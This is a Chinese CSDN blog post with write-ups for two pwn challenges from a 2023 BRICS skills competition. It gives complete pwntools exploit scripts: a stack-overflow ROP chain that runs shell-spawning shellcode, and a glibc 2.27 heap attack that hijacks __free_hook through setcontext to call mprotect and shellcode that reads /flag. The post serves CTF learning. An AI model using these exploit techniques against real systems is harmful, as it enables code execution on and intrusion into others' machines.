2023一带一路暨金砖国家技能发展与技术创新大赛之网络安全在企业信息管理中的应用-初赛-PwnWriteUps

已于 2023-10-20 14:24:58 修改
阅读量332 收藏 1
点赞数 1
分类专栏: 比赛WriteUps 文章标签: 网络安全 计算机网络
于 2023-10-20 14:19:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44194735/article/details/133945314
版权

pwn0402

在这里插入图片描述

  • 我们采用溢出后再次read 然后写shellcode 在栈上ret

在这里插入图片描述

在这里插入图片描述

from pwn import *
s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(str(delim), data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(str(delim), data)
r       = lambda num                :io.recv(num)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
ls      = lambda data               :log.success(data)
context.arch      = 'amd64'
context.log_level = 'debug'
context.terminal  = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.RE:
        return remote()
    else:
        return process([binary] + argv, *a, **kw)

gdbscript = '''
continue
'''.format(**locals())

binary = './pwn0402'
libelf = ''

if (binary!=''): elf  = ELF(binary) ; rop=ROP(binary)
if (libelf!=''): libc = ELF(libelf)

io = start(binary)
#io = remote()
main = 0x400A05
d1 = bytes.fromhex('90f8e3bffef9f2bf')[::-1]

ru('secret: ')
x = int(io.recvline(),16)
rdx_rsi = 0x0000000000442b89 # pop rdx ; pop rsi ; ret
rax     = 0x000000000041f6b4 # pop rax ; ret
xsh = 0x00000000004c1aa7 # xor byte ptr [rdx], al ; ret
gdb.attach(io,'b *0x0400ABF')
print(hex(x))
binsh = x + 3498

p = b''.ljust(0x98,b'\x90')
p += p64(rdx_rsi)
p += p64(0x100) + p64(x + 200)
p += p64(0x4016e6) #rdi
p += p64(0)
p += p64(0x0412ECB) # read 
sl(p)
pause()
sl(p64(x+210)+b'\x90'*20+asm(shellcraft.sh()))

call read 的地址也可以调整下

在这里插入图片描述

pwn-orw_h1

libc 2.27 __free_hook 打 setcontext

from pwn import *
s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(str(delim), data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(str(delim), data)
r       = lambda num                :io.recv(num)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
ls      = lambda data               :log.success(data)
context.arch      = 'amd64'
context.log_level = 'debug'
context.terminal  = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.RE:
        return remote()
    else:
        return process([binary] + argv, *a, **kw)

gdbscript = '''
continue
'''.format(**locals())

binary = './orw_h1'
libelf = './libc-2.27.so'

if (binary!=''): elf  = ELF(binary) ; rop=ROP(binary)
if (libelf!=''): libc = ELF(libelf)

io = start(binary)
#io = remote()


def add(size,text='A'):
    sla('>> ','1')
    sla('tion:\n',str(size))
    sla('tion:\n',text)
def rm(idx):
    sla('>> ','2')
    sla('index: ',str(idx))
def edit(idx,text):
    sla('>> ','3')
    sla('index: ',str(idx))
    sla('tion:\n',text)
def show(idx):
    sla('>> ','4')
    sla('index: ',str(idx))

add(0x500) # idx0
add(0x100) # idx1

rm(0)
show(0)
main_arena= uu64(r(6))
libc_base = main_arena - 4111520
__free_hook = libc_base + libc.sym['__free_hook']
setcontext = libc_base + libc.sym['setcontext']
mprotect = libc_base + libc.sym['mprotect']
add(0x500) # idx2

rdi = libc_base + 0x2164f
rsi = libc_base + 0x23a6a
rdx = libc_base + 0x1b96
ret = libc_base + 0x8aa

add(0x100) # idx3
add(0x100) # idx4
rm(1)
rm(3)
edit(3,p64(__free_hook)*2)
pay = b'\x41' *0xa0+ p64(__free_hook+0x10) + p64(ret)
edit(2,pay)

add(0x100) #idx5
add(0x100) #idx6 free_hook_addr
pay = p64(setcontext + 53) + p64(0x0) + p64(rdi) + p64(__free_hook &0xfffffffffffff000) + p64(rsi) + p64(0x1000) + p64(rdx) + p64(7) + p64(mprotect)
pay += p64(__free_hook + len(pay)+8)
pay += asm(shellcraft.cat('/flag'))
edit(6,pay)
ls(hex(libc_base))
ls(hex(__free_hook))
gdb.attach(io,'b *$rebase(0x00E60)')
rm(2)



io.interactive()
CTF_imLZH1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2023金砖-IT网络系统管理-网络布线与设备配置(路由交换)
只一网络工程师
07-21 937
2023-7-1金砖国家技能大赛IT-网络系统管理赛项报名结束,陆续为大家开放了训练平台,由联教育提供技术支持为各参赛人员提供了一个公平的训练环境。平台为大家提供的训练样题和训练真实比赛环境,让大家在赛前充分的准备。省选拔赛和区域选拔赛在8月与9月陆续开赛,祝大家能取得一个优异的成绩!
2023金砖-IT网络系统管理-网络布线与设备配置(路由交换)-自动化运维部分参考代码,仅供参考!!!!!
07-21
2023金砖大赛IT网络系统管理,第一赛段Python自动化运维代码参考,不一定准确。
2023金砖国家职业技能大赛——BRICS-FS-01_Web技术_国际-技术描述TD(线下)
君逍遥o
12-05 1349
Web 技术项目指根据项目需求进行站点设计,实现能够在各种终 端使用的 B/S 架构业务及功能的竞赛项目。选手要熟练地使用 JAVA 框架开发服务器端 API 接口;使用 HTML5 及 CSS3 实现页面,并完成 各种交互效果的开发;使用 JavaScript 及前端框架完成前后端数据交互 并显示在页面上。此外还要对代码编写过程发生的异常进行妥善处理,最终的作品还要兼顾常用浏览器以及软硬件之间的兼容性。
2023 金砖国家职业技能大赛网络安全省赛理论题样题(金砖国家未来技能挑战赛)
Geek极安云科-致力于网络安全事业
12-05 1024
| | 网络安全 | 路由器、交换机、防火墙、日志审计、入侵检测等安全组网安全设备管理与安全配置等;防火墙路由、安全策略、NAT、VPN等配置和测试;网络日志系统网络检测、统计、告警等配置;web应用防火墙防护策略、过滤策略、告警等配置;无线管理、无线 网络设置、安全策略等配置和测试;三层交换机路由、 二层安全等配置和测试; | | | 安全运营 | 应用系统安全与操作系统安全运营知识点考核; | |
全国职业技能大赛网络安全-金砖技能大赛——应急响应内存镜像分析(超详细解析)
Jay
12-20 1992
4.从内存文件找到异常程序植入到系统的开机自启痕迹,使用Volatility工具分析出异常程序在注册表植入的开机自启项的Virtual地址,将Virtual地址作为Flag值提交;DLL dlllist -p 查看一下这个进程的查看一下这个进程的DLL,发现程序是在temp目录下执行的,那这个应该就是恶意软件进程了。5.从内存文件找到异常程序植入到系统的开机自启痕迹,将启动项最后一次更新的时间作为Flag值(只提交年月日,例如:20210314)提交。
2023 金砖国家职业技能大赛网络安全省赛二三阶段样题(金砖国家未来技能挑战赛)
Geek极安云科-致力于网络安全事业
12-05 815
1. 分析题目给出的源代码,并利用源代码存在的漏洞读取 Flag 进行提交;Fail(表示失败),Result:Success(表示成功,并会给出 flag 字符串)\3. 当前 MySQL 服务器的密码被遗忘了,现需要通过其他的方式登录到 MySQL。MySQL 配置,将当前 MySQL 密码最少长度要求的值作为 flag 进行提交,提。获得的完整错误日志路径作为 flag 值提交,提交格式:flag{******};\1. 通过分析数据库服务器的配置,获得 MySQL 当前配置的错误日志路径,将。
2023一带一路金砖国家技能发展技术创新大赛网络安全”赛项省选拔赛样题卷②
Aluxian_的博客
01-12 1613
2023一带一路金砖国家技能发展技术创新大赛网络安全”赛项省选拔赛样题卷②
CTF-2023一带一路金砖国家技能发展技术创新大赛_网络安全企业信息管理应用赛项线下总决赛-misc1-题解-wp
weixin_63308767的博客
11-25 282
网络安全-CTF-MISC
2023一带一路金砖国家技能发展技术创新大赛网络安全”赛项省选拔赛样题卷①
Aluxian_的博客
01-12 1753
2023一带一路金砖国家技能发展技术创新大赛网络安全”赛项省选拔赛样题卷①
2023一带一路金砖国家技能发展技术创新大赛企业信息系统安全赛项】国内赛竞赛样题
ZL_1618的博客
02-28 1895
网络安全入门到底是先学编程还是先学计算机基础?第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。选择难易程度为“high”,然后点击“Submit”提交,将上一步重新构造的语句重新进行提交,发现报错,点击“view_source”查看源代码,发现服务器端对。点击“Command。
2023第七届一带一路金砖大赛企业信息系统安全赛项样题
05-31
2023第七届一带一路金砖大赛企业信息系统安全赛项样题
2021一带一路金砖大赛企业信息系统安全赛项AWD-writeup(解析)
12-18
专业培养服务社会和行业发展的能力,为国家信息安全行业培养选拔技 术技能型人才。 重点考核参赛选手安全网络组建、网络系统安全策略部署、信息保 护、网络安全运维管理的综合实践能力,具体包括: 1.参赛选手能够...
2021一带一路金砖大赛企业信息系统安全赛项决赛样题-(解析)
12-18
专业培养服务社会和行业发展的能力,为国家信息安全行业培养选拔技 术技能型人才。 重点考核参赛选手安全网络组建、网络系统安全策略部署、信息保 护、网络安全运维管理的综合实践能力,具体包括: 1.参赛选手能够...
2022金砖国家技能发展技术创新大赛厦门国际赛 物联网及其在智慧城市应用.zip
11-09
物联网大赛相关程序代码、设计文档、使用说明,供参考 物联网大赛相关程序代码、设计文档、使用说明,供参考 物联网大赛相关程序代码、设计文档、使用说明,供参考 物联网大赛相关程序代码、设计文档、使用说明,供...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8191
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
机械设计同轴剥皮机sw18可编辑非常好的设计图纸100%好用.zip
05-01
机械设计同轴剥皮机sw18可编辑非常好的设计图纸100%好用.zip
node-v12.22.5-linux-arm64.tar.xz
最新发布
05-01
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Honeywell BR-310 条形码扫描器手册
05-01
Honeywell BR-310 条形码扫描器手册
国诗词APP「西窗烛」产品需求文档.docx
05-01
国诗词APP「西窗烛」产品需求文档
金砖职业技能大赛有什么用呢
07-16
金砖职业技能大赛是一个国际性的比赛,旨在提高职业教育和技能培训的水平,并促进不同国家技能人才的交流与合作。参与金砖职业技能大赛有以下几个益处: 1. 提升技能水平:参赛者通过比赛,可以接触到最新的职业技能标准和最佳实践,从而提高自己的技能水平。 2. 增加国际交流:金砖职业技能大赛是一个国际性的比赛,参赛者可以与来自不同国家的选手交流经验、分享技术,扩展自己的国际视野。 3. 增强就业竞争力:参与金砖职业技能大赛可以在简历增加一项国际化的荣誉,这对于求职者来说是一种竞争优势。 4. 推动职业教育发展金砖职业技能大赛可以促进各国职业教育体系的改进和发展,推动职业教育的现代化和国际化。 总之,金砖职业技能大赛对于参与者个人的技能提升和职业发展具有积极的影响,同时也对于推动国际职业教育与技能培训的发展有着重要的作用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值